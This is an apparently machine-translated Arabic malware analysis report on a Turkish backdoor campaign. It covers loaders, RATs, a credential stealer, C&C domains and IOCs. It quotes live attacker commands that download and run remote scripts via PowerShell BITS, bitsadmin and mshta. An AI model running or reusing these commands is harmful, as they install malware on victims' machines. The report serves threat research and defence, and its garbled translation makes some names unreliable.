الحيل التركية مع الديدان والفئران ... ومستقل

اكتشف متخصصون في مجموعة أبحاث التهديد التابعة لمركز أمان التقنيات الإيجابية (PT Security Security Center) حملة ضارة كانت نشطة منذ منتصف يناير 2018 على الأقل. تستهدف العملية مستخدمين من البرازيل والمملكة المتحدة والمجر وألمانيا ولاتفيا والولايات المتحدة الأمريكية وتركيا والفلبين. تُستخدم مجموعة متنوعة من الأدوات والتقنيات في إصابة جهاز الكمبيوتر الخاص بالضحية والسيطرة عليه. يعرض هذا التقرير تفاصيل مرحلة الإصابة ، والأدوات المساعدة المستخدمة ، وميزات تنظيم البنية التحتية للشبكة ، بالإضافة إلى الآثار الرقمية التي أدت بنا إلى أن نكون القراصنة المرشحين.

ملخص

• قام المهاجمون بمعالجة الدودة قبل 10 سنوات ، مع مراعاة التقنيات الحديثة
• حديقة الحيوانات من الأدوات المستخدمة جنبا إلى جنب مع البنية التحتية للشبكة واسعة النطاق
• المشتبه به الرئيسي هو مستقل تركي

تسليم الحمولة الصافية

مستندات المكتب

في 5 نيسان (أبريل) 2019 ، كجزء من تعقب التهديدات الجديدة ، اكتشف المتخصصون في مركز خبراء أمن PT وثيقة مكتبية مشبوهة. ملف بالملحق .docm (مستند MS Word لعينة جديدة مع دعم الماكرو):

• تم إنشاؤه قبل اكتشافه ببضعة أيام (2019-03-31) ،
• يحتوي على صورة لإقناع المستخدم بتمكين وحدات الماكرو ،
• تم إنشاؤه على نظام باللغة التركية (يتضح هذا من خلال قيم حقول البيانات الأولية: "Konu Başlığı" - "عنوان الموضوع" ، "Konu Ba l ، 1" - "عنوان الموضوع ، 1" ؛ ترجمة جوجل للترجمة).

التين. 1. فخ إعلام الماكرو النموذجي

رمز الماكرو غامض بعض الشيء ، ولكنه لا يزال: باستخدام الأمر cmdlet لـ "إدارة النقل الذكي في الخلفية" لـ PowerShell ، فإنه يقوم بتنزيل وتشغيل برنامج نصي JScript من خادم مهاجم:

Shell ("pow" & "ershe" & "ll -comm" & "and ""$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb1.js;');Start-Process -WindowStyle hidden -FilePath 'cmd.exe' -ArgumentList '/c %systemroot%\system32\wscript %temp%\bb1.js'""") 

يرجع استخدام PowerShell ووحدة نمطية غير نمطية لتنزيل الملفات من خادم الويب إلى محاولة التحايل على القيود المفروضة على إطلاق وتنفيذ برامج غير موثوق بها.

هناك عدة وثائق مماثلة. على سبيل المثال ، أحدهما هو ملف .doc (مستند MS Word قديم الطراز) مع صفحة الرموز من الأحرف باللغة التركية. يشبه العمل الكلي أيضًا:

 Shell "cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND https://definebilimi.com/up3e.js %temp%\o2.js & wscript.exe %temp%\o2.js", vbHide 

في هذه الحالة ، يستخدم المؤلف نفس تقنية BITS ، ولكن بمساعدة أداة النظام الشرعية bitsadmin. ومن المثير للاهتمام ، أن تاريخ إنشاء المستند والوقت الذي تم اكتشافه فيه في المصادر العامة يرسلان إلينا منتصف تموز (يوليو) 2018. وبالتالي ، فإن الهجمات ذات الصلة لمدة عام على الأقل. بالإضافة إلى ذلك ، يتم استخدام نفس خادم المهاجم لتحميل الحمولة ؛ طريقة تسمية البرنامج النصي للتحميل في JScript مشابه.

يحتوي مستند آخر على الملحق .rtf (Rich Text Format). يحتوي على عدة مستندات .xls (مستند MS Excel قديم الطراز) بنفس المحتوى. تتطابق شفرة الماكرو تمامًا مع الشفرة المستخرجة من المستند الأصلي ، ويؤدي تزامن قيم صفحة الرموز وحقل XML HeadingPairs إلى التأليف نفسه.

اختصارات LNK

تجدر الإشارة إلى أنه في هذه الحملة ، لم يتم استخدام وثائق المكتب فقط كمرحلة أولية للإصابة. التقينا بعدد من ملفات .lnk الضارة (Windows Shell Link) ، والتي عند تشغيلها ، قامت بتشغيل الأمر التالي:

 C:\Windows\System32\cmd.exe /c powershell -command "$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb.js;')" & %systemroot%\system32\wscript %temp%\bb.js 

تم توزيع الملصقات في منتصف مارس وأواخر أبريل 2019.

تحتوي بيانات تعريف الاختصار على اسم المستخدم win7-bilgisayar (من "win7-computer التركي") - مستخدم النظام الذي تم إنشاؤه عليه.

يمكننا أن نفترض بأمان أن رسائل البريد الإلكتروني المخادعة هي السيناريو الأكثر احتمالا لتسليم الملفات الضارة في المرحلة الأولى من الإصابة.

هوديني التحول

يتم تنزيل جميع الكائنات التي تم فحصها في المرحلة الأولى من الإصابة وتشغيل البرنامج النصي نفسه في JScript (دون مراعاة الاختلافات الطفيفة). الملف ليس غامضًا ولا معبأ ، والشيء الوحيد الذي تم القيام به لتعقيد التحليل هو أسماء المتغيرات العشوائية. إنه مستتر على منصة WSH. من ميزات عمله ، يمكن تمييز ما يلي:

• محمية عنوان المضيف والمنفذ من خادم الإدارة في البرنامج النصي
• يتم التفاعل مع C&C عن طريق طلبات POST لبروتوكول HTTP.
• في لحظة بدء العمل ، تُدرج السلسلة "is-bekle" في حقل URI ، ويُترجم من التركية إلى "جاهز".
• يحتوي حقل User-Agent على معلومات مختصرة حول النظام مع المحدد المحدد (في هذه الحالة ، "<|>"):
  
  • الرقم التسلسلي للقرص الصلب
  • اسم المستخدم،
  • نسخة النظام
  • اسم البرنامج النصي
  • اسم مكافحة الفيروسات
  • قيمة متغير البيئة٪ ProgramData٪ ،
  • وجود .Net FrameWork 4.5.2 في النظام ،
  • مهلة بين الطلبات ،
  • جافا في النظام.
  
  
• للتحقق من البيئة المحيطة بموضوع صندوق الحماية الخاص بـ Kaspersky Lab من خلال الرقم التسلسلي المحدد لمحرك الأقراص الثابتة. في حالة الصدفة ، فإنه يتوقف عن العمل.
• يستقبل من الخادم وينفذ الأوامر المعطاة ؛ هؤلاء بعض منهم:
  
  • تنزيل ملف من الخادم ،
  • تحميل الملف إلى الخادم
  • جمع محتويات الحافظة ،
  • مجموعة من محتويات الكتالوج ،
  • جمع معلومات العملية ،
  • تشغيل الأوامر في مترجم cmd.exe ،
  • أخذ وإرسال لقطة ،
  • استرجع وأرسل قواعد بيانات Chrome و Opera بكلمات مرور.
  
  

التين. 2. بداية البرنامج النصي المحمّل في JScript من خادم المهاجم

من خلال وجود تعليقات ، وهيكل الكود ، وأسماء الأوامر المستخدمة والتنسيق لجمع المعلومات حول النظام ، يمكن للمرء أن يرسم موازًا مع دودة VBS المعروفة Houdini. في عام 2013 ، قدم زملاؤنا من FireEye تحليلًا مفصلاً لوظائف هذا طروادة ، ومعالجة الأوامر وجمع المعلومات التي تحدث فيها بطريقة مماثلة. يبدو أنه في حالتنا ، اتخذ المهاجم نموذجًا للديدان المعروفة ، وأعد كتابة الدالات ليس في VBScript ، ولكن في JScript ، واستبدل بعض الخطوط الإنجليزية بخطوط تركية.



التين. 3. معالجة أوامر JScript مستتر

تجدر الإشارة إلى أنه كدليل على نتائج تنفيذ الأمر ، يتم استخدام السلاسل التي تحتوي على السلسلة الفرعية "Bcorp". وهو موجود أيضًا باسم خادم إدارة ip1 [.] Bcorp.fun.

على خادم المهاجم

وفقًا لـ Shodan ، بدءًا من 30 أبريل 2019 ، استضاف مهاجم خادم ويب يستند إلى AppServ . لا يبدو أن الخادم قد تم تكوينه بعناية: على سبيل المثال ، صفحة phpinfo متاحة ، والتي تكشف عن معلومات تهيئة مثيرة للاهتمام. عند تحليل روابط الويب التي تم تنزيل البرامج الضارة منها ، تبين أن الخادم لديه دليل مفتوح (./a directory) يسرد أدوات المهاجمين الآخرين.



التين. 4. الصفحة الرئيسية لخادم المهاجم



التين. 5. صفحة phpinfo على خادم المهاجم



التين. 6. سرد الدليل المفتوح لخادم المهاجمين في نهاية أبريل 2019



التين. 7. سرد الدليل المفتوح لخادم المهاجمين في نهاية مايو 2019

يوجد أدناه وصف للملفات المكتشفة.

هوديني jscript

بادئ ذي بدء ، تلقينا العديد من الاختلافات في دودة Houdini المعدلة ، التي نوقشت أعلاه. من الإصدار إلى الإصدار ، مر البرنامج النصي بتغييرات بسيطة: أسماء المضيف (husan2.ddns.net ، ip1.bcorp.fun ، ip1.qqww.eu) ، المنافذ (86 ، 87) ، أسماء متغيرة ، أوامر فردية ظهرت أو اختفت. تم تأطير نسخة واحدة كبرنامج نصي في JScript.



التين. 8. هوديني JScript كبرنامج نصي

Bcorp جرة

مستتر جافا خفيفة الوزن. يتفاعل مع C&C عبر TCP على المنفذ 22122. يمكنه:

• تنفيذ الأوامر في مترجم cmd.exe ،
• تحديد إصدار النظام
• قائمة الدلائل
• تحميل الملفات
• التسجيل في دليل بدء التشغيل وفرع بدء التسجيل.

يبدو أن هذا هو بالضبط السبب وراء قيام الدودة المعدلة بالتحقق من وجود Java في النظام. في الوقت نفسه ، ليس من الواضح سبب استخدام مستتر إضافي ، لأن الأصل يحتوي على مجموعة كافية من الوظائف.

الحصول على لChromeCreds

مجمع PowerShell لاستخراج السجل وتسجيلات الدخول وكلمات المرور وملفات تعريف الارتباط من متصفح Chrome. تحتوي بعض الإصدارات على مكتبة مساعدة System.Data.SQLite.dll لأنظمة x86 و x64 في شكل ترميز base64 ، بينما تفترض إصدارات أخرى وجودها في الدليل٪ APPDATA٪. ويأتي المكون كبرنامج إضافي مساعد لجدار JScript الخلفي الرئيسي.

بدء كلوغر

بوويرشيل تنفيذ كلوغر بسيط. ويأتي المكون كبرنامج إضافي مساعد لجدار JScript الخلفي الرئيسي.



التين. 9. PowerShell كلوغر كود المقتطف

WebBrowserPassView

أداة مساعدة من Nirsoft للحصول على معلومات تسجيل الدخول وكلمات المرور من المتصفحات الشائعة. استخدم المهاجمون نسخة المؤلف ، حيث سبق لهم تعبئتها بـ ASPack لتعقيد التحليل أو تجاوز الكشف بواسطة المؤشرات.

NetWire RAT

أداة تجارية متاحة للجمهور للتحكم عن بعد بالكمبيوتر. المستخدمة من قبل مختلف الجماعات مجرمي الإنترنت. قام مطورو البرامج الضارة بتعقيد التحليل والاكتشاف عن طريق تعبئة RAT في PE على النظام الأساسي .NET وباستخدام obfuscator رمز DeepSea 4.1.

استمع TCP

أداة واجهة المستخدم الرسومية بسيطة من AllScoop لاختبار المعلمات من جهاز التوجيه أو جدار الحماية. يستجيب كل منفذ استماع بسلسلة معينة ، وينهي الاتصال.



التين. 10. واجهة المستخدم الرسومية لبرنامج التعاون الفني الاستماع المساعدة

Lnk محمل

محمل اختصار ، على غرار تلك التي سبق التفكير فيها. عند بدء التشغيل ، يعمل الأمر التالي:

 C:\Windows\System32\cmd.exe /v /c "set i=h&&ms!i!ta http://ip1.qqww.eu/1/f.htm" 

هذه المرة تم إنشاء الاختصار تحت مستخدم آخر (سطح المكتب - amkd3n3).

رافعات البرامج النصية

في هذه المجموعة ، قمنا بدمج مختلف برامج تحميل التشغيل من RAT أعلاه. جميعها صغيرة (تصل إلى 1 كيلوبايت) ، بتنسيقات مختلفة (.htm ، .xsl ، .hta ، إلخ.) ، يتم تنفيذ التعليمات البرمجية بعدة لغات نصية (JScript ، PowerShell) ويتم تجميعها على الفور C #. فيما يلي مقتطفات شفرة لبعض العينات:



التين. 11. جزء من لودر .htm



التين. 12. جزء من محمل الإقلاع .xsl



التين. 13. جزء من محمل الإقلاع .ps1

لوادر صغيرة pe

بالإضافة إلى برامج تحميل النصوص ، تم اكتشاف ملفات PE على النظام الأساسي .NET. كما أنها صغيرة (تصل إلى 10 كيلو بايت) ، مع وظائف رحيب مماثلة:



التين. 14. مثال على شفرة decompiled لأحد برامج التحميل PE

xRAT

مشروع متاح للجمهور وموزع مجانًا لإدارة الكمبيوتر عن بُعد. الإصدارات والتعديلات المختلفة واسعة الانتشار. مكتوب في C # ، غامض جزئيًا.

لوحة Bcorp مقابل باني

الجزء خادم التحكم ل JScript مستتر. في الوقت نفسه ، هو مصمم الجزء العميل. يمثل PE على النظام الأساسي .NET. لا تحجبها ، لا تعبئتها. تشبه الواجهة جزء خادم أعيد تصميمه لفيروس VBS المذكور بالفعل Houdini. بالإضافة إلى إرسال الأوامر ، يتم تحميل المكونات الإضافية والإضافات الموضحة مسبقًا: بيئة Java والبرامج النصية PowerShell والأداة المساعدة من Nirsoft لجمع المعلومات من المستعرضات والبرامج النصية PowerShell لاعتراض ضربات المفاتيح ، وما إلى ذلك. من الغريب أن يسمى المشروع BcorpRat ، والتي يمكن رؤيتها في عنوان النافذة في الصور أدناه. وباسم مساحة الاسم في الكود المصدري ، يوجد السطر "Btech" ، والذي سنعود إليه لاحقًا.



التين. 15. JScript الباب الخلفي لوحة التحكم ، النافذة الرئيسية



التين. 16. لوحة التحكم JScript-backdoor ، نافذة المصمم لجزء العميل

البنية التحتية للشبكة

بعد ذلك ، سنجري تحليلًا أكثر تفصيلًا للعناوين التي تفاعلت بها هذه البرامج الضارة أو المهاجمين. لنبدأ بنطاق التعريفbilbilimi.com ، الذي يتم الوصول إليه من خلال مستندات المكتب ومحمل الاختصارات.

definebilimi.com

في 16 كانون الثاني (يناير) 2018 ، لدى هذا النطاق مالك جديد. بالمناسبة ، يتم تعريف حرف "bilimi" حرفيًا من التركية كـ "كنز العلم". فيما يلي البيانات الأكثر إثارة للاهتمام من سجل سجلات WHOIS في ذلك الوقت.
جدول 1. معلومات عن المسجل (المالك) لنطاق identbilimi.com


سيكون من المتهور الادعاء بأن البيانات أصلية. يسمح لنا البلد المشار إليه وتكرار حدوث آثار اللغة التركية في الكود بافتراض أن هذه الصدف ليست مصادفة. ويحتوي عنوان البريد الإلكتروني على السلسلة الفرعية "btech" ، والتي أولينا اهتمامًا بها بالفعل.

يبدو أن تاريخ التغييرات على خوادم NS التي قدمت معلومات حول المجال المسجل مثير للاهتمام:


جدول 2. محفوظات خوادم NS لنطاق identbilimi.com

تمت مصادفة مضيفي buhar.biz و qqww.eu بالفعل في البرامج الضارة سابقًا.

buhar.us

التاريخ الجديد لهذا المجال ("buhar" من التركية - "الأزواج") يبدأ في نفس اليوم الذي يبدأ فيه تاريخ identbilimi.com - 16 يناير ، 2018.


جدول 3. معلومات عن المسجل (مالك) المجال buhar.us

الوضع مشابه: مرة أخرى ، تبدو بعض البيانات مزيفة باستثناء العنوان البريدي ("buharcin" من التركية - "قاطرة").

bcorp.fun

تم تسجيل النطاق منذ 23 مارس 2019. بالإضافة إلى حقيقة أن تركيا مسجلة مرة أخرى كدولة ، يتم سرد Bcorp كمنظمة العميل. في الواقع ، نرى نفس الشيء في اسم النطاق نفسه ، كما في عدة فقرات سابقة.

husan2.ddns.net

من الغريب أن يهاجم المهاجم المضيفين ليس فقط بالطريقة الكلاسيكية. منذ منتصف مارس 2019 ، تم تسجيل استخدام خوادم DNS الديناميكية المزعومة. تتيح هذه التقنية للمهاجمين إخفاء عناوين IP الخاصة بهم بشكل فعال وضمان حيوية مراكز التحكم الخاصة بهم. تجدر الإشارة إلى بعض القابلية للتنبؤ في اختيار الأسماء: على سبيل المثال ، بعد بضعة أشهر ، تم اكتشاف استخدام نطاق husan3.ddns.net ، ولكن يعود تاريخ نشاط husan.ddns.net إلى أبريل 2017.

bkorp.xyz

منذ أوائل شهر أبريل ، يقوم المتسلل ، الذي يستمر في السير على طريق إخفاء الهوية ، بتسجيل النطاقات باستخدام خدمة WhoisGuard، Inc. ، الموجودة في بنما ؛ bkorp.xyz و prntsrcn.com و i37-imgur.com هي مجرد أمثلة قليلة. لا تزال خوادم NS المستخدمة تربطهم بالمجالات الضارة الأخرى.

qqww.eu

بالإضافة إلى حقيقة أن هذا المجال ، مثل المجال bcorp.fun ، له نطاق فرعي IP1 ، هناك تفاصيل مهمة أخرى. تشير المعلومات الموجودة على المسجل إلى مؤسسة Osbil Technology Ltd. ، المزعومة الموجودة في برلين. في الواقع ، يقع التنظيم الذي يحمل نفس الاسم على ساحل قبرص في مدينة فاماغوستا - في أراضي الجمهورية التركية لشمال قبرص المعترف بها جزئيًا. ويقع الموقع الرسمي للشركة على المجال ، والذي كان خادم NS للمجال bcorp.fun من مارس إلى مايو 2019. لم نعثر على أي علامات تنازل عن خادم الأسماء ، وميزات البنية التحتية لمزود الخدمة (استبدال العميل ببيانات الموفر في عمود المسجل) جعلت من الممكن إخفاء معلومات العميل عن الوصول العام.



التين. 17. معلومات حول المسجل (مالك) لنطاق qqww.eu

عناوين IP

من أجل الاكتمال ، فيما يلي عناوين IP - مع بعض المجالات المقابلة لها على فترات زمنية مختلفة:

• 5.255.63.12
  
  • bcorp.fun
  • husan.ddns.net
  • husan2.ddns.net
  • husan3.ddns.net
  • qqww.eu
  
  
• 192.95.3.137
  
  • bcorp.fun
  • bkorp.xyz
  • definebilimi.com
  • i36-imgur.com
  • i37-imgur.com
  • i38-imgur.com
  • i39-imgur.com
  • prntsrcn.com
  • qqww.eu
  
  
• 192.95.3.140
  
  • bkorp.xyz
  • buhar.us
  
  

  في أعقاب القراصنة

  
  من بين الأدوات الخبيثة والمساعدة ، تم العثور على صورة غريبة على خادم المهاجم:
  
  
  
  التين. 18. الصورة في الدليل على استضافة المهاجم
  
  لم نخفض دقة الصورة ، لكن وضعناها هنا بالشكل الذي كانت عليه على المضيف.
  
  على الرغم من انخفاض جودة الصورة ، تمكنا من إثبات أن هذه لقطة شاشة لصفحة حول معاملة مكتملة باستخدام عملة مشفرة على blockr.io للمورد. لم ينجح هذا ، لذلك حاولنا العثور على كل ما يتعلق بالاسم IMG_JPEG-0371e4dce3c8804f1543c3f0f309cc11.jpg الذي تم تخزين الصورة به من قبل المتسلل. أدت الآثار إلى نتيجة معالجة بعض الملفات على محلل عبر الإنترنت تزامن اسمه مع اسم صورتنا. الكائن الذي تمت معالجته هو اختصار Windows ، مثل تلك التي قمنا بفحصها مسبقًا من قبل. تم إرفاق صورة له مع صورة البطاقة الشخصية لمواطن تركي ، يتزامن اسمه الأخير مع الاسم الأخير الذي تم الإشارة إليه عند تسجيل النطاق - Yaman.
  
  
  
  التين. 19. بطاقة الهوية مع محمل الإقلاع
  
  لم تحدث معالجة الاختصار في صندوق الحماية على الإنترنت نتيجة لتنزيل المستخدم للملف ، ولكن عن طريق نقل عنوان URL الذي كان من الضروري تنزيله ومعالجته:
  
  hxxps://github.com/btechim/prntsrcn/blob/nm46ny/IMG-0371e4dce3c8804f1543c3f0f309cc11.jpg.lnk?raw=true
  
  حساب github الخاص بالمستخدم محظور بالفعل ، ومع ذلك ، باستخدام الرابط يمكننا تعيين لقب المستخدم (btechim) واسم المشروع (prntsrcn). يتزامن اسم المشروع مع اسم أحد النطاقات الموجودة في الحملة (prntsrcn.com) ، ويحتوي اسم المستخدم المستعار على btech سلسلة فرعية ، والتي تظهر في رمز البرنامج الخاص بلوحات الإدارة المذكورة أعلاه.
  
  قادنا البحث عن لقب مستخدم إلى مورد لحسابهم الخاص توجد عليه صفحة مستخدم من تركيا - تحمل نفس الاسم المستعار ، مع رقم هاتف مؤكد وعنوان بريد وملف فيسبوك - تقدم خدماتها في تطوير البرمجيات في مجال الأمن السيبراني.
  
  
  
  التين. 20. صفحة المهاجم المزعومة على المورد لحسابهم الخاص
  
  

  النتائج

  
  لعدة أشهر ، راقب خبراء شركة ايجيبت تكنولوجيز تطور حملة ضارة من أصل تركي ونقلوا البيانات المتراكمة إلى CERT تركيا. في كثير من الأحيان ، يتم الجمع بين استخدام التقنيات الحديثة والأدوات المعاد تدويرها منذ 10 سنوات خلال سلسلة من الهجمات. استخدم المهاجم مجموعة متنوعة من الأدوات (حسب الغرض ، حسب النظام الأساسي ، حسب مستوى الصعوبة) للسيطرة الكاملة على الكمبيوتر الهدف. تجدر الإشارة إلى تباين الأساليب في إعداد البنية التحتية للشبكة في محاولات لإخفاء هويتها. ومع ذلك ، مرة أخرى ، لم يتم أخذ كل شيء في الاعتبار ، وتم إصدار الغطرسة والعديد من الإغفالات من قبل الجاني. تمت إحالة الدراسة إلى مركز الاستجابة لحوادث أمن المعلومات التركي.
  
  
  شركات النفط العالمية

  مكتب تحميل:
  3305720da73efbcb7d25edbb7eff5a1a
  5b6d77f3e48e7723498ede5d5ba54f26
  621a0133e28edec77a2d3e75115b8655
  712e7ec49ad3b8c91b326b6d5ee8dcd8
  731a3d72e3d36c2270c1d0711c73c301
  929374b35a73c59fe97b336d0c414389
  
  لوادر LNK:
  3bc5d95e2bd2d52a300da9f3036f5b3b
  527069e966b4a854df35aef63f45986a
  a4667e0b3bfaca0cda5c344f1475b8e0
  
  هوديني JScript:
  04c2ad67de2cea3f247cf50c5e12e969
  5ab9176b9ed9f7a776ec82c412a89eab
  84f0d098880747f417703f251a2e0d1c
  94c6ba0d812b4daf214263fffc951a20
  a52509a38846b55a524019f2f1a06ade
  bf2fb6cdbc9fde99e186f01ad26f959f
  c871091ce44594adbd6cf4388381e410
  daf6a9eb55813d1a151695d33506179d
  f010af1b330d00abb5149e9defdae6ee
  ff924faeb9dfd7384c05abe855566fc9
  
  Bcorp جرة
  59978b5a9e4ab36da0f31a8f616cc9d3
  a7219da3b0c0730c476fe340dbf7e4e5
  ddac55213089da9ef407bce05ebe653e
  
  الحصول على لChromeCreds
  11769e9f49123a2af00bd74453221c07
  1a81c9119d7761535c198ddb761979b8
  42a85849a591e65b0254d9bcbdf59f82
  8e49263f33c53ee5bc91bebbf9617352
  c9ab090ad2badb9862fd5b6058428096
  
  بدء كلوغر
  55daa84475a11ea656183e0ad5ccc608
  aa82fbb6a341d71d2431b6d2ebca027c
  
  WebBrowserPassView
  7722e086cf7ed59955a1d6ec26f49cf3
  
  NetWire RAT
  1470a08bd427bb8738a254ba4f130ff5
  5f8495016773c7834b1c588f0997a6c4
  
  استمع TCP
  913567da98185cad9f91a570dc298de1
  
  رافعات البرامج النصية
  02946d10c6a34fe74826f3c0b0a6a3e0
  1ad644bdba488a6e42ad76aea2c0ee54
  3a2dcf36b9206a135daa73c645a3f56f
  4dddd87d3cb80145c9859fd76dfef794
  74c5e5be9f79bd9e7ee84fd046c14e68
  78f4d5fa6c68dae4b03860b54ec6cc67
  
  لوادر صغيرة pe
  0f3c56018a7051aebe060454fc981f5b
  1b9cefc229daddc4557cea0e3bdf4656
  29e6679107bd9c72aa061371082206bb
  b66b7395825b9ed656b768d4e7fe1de7
  fbc606b8b04e51ddb342e29b84ac1edb
  
  xRAT
  2e9a0637478938cc3e4519aa7b4219cc
  7c67c93ba243be32e5fd6a6921ceded3
  
  لوحة Bcorp مقابل باني
  405c987ba1a8568e2808da2b06bc9047
  c3ac8b7a7c8c0d100e3c2af8ccd11441
  
  Bcorp C&C
  bcorp.fun
  bkorp.xyz
  buhar.us
  definebilimi.com
  husan.ddns.net
  husan2.ddns.net
  husan3.ddns.net
  i36-imgur.com
  i37-imgur.com
  i38-imgur.com
  i39-imgur.com
  prntsrcn.com
  qqww.eu
  5.255.63.12
  192.95.3.137
  192.95.3.14
  
  
  أرسلت بواسطة أليكسي فيشناكوف ، تقنيات إيجابية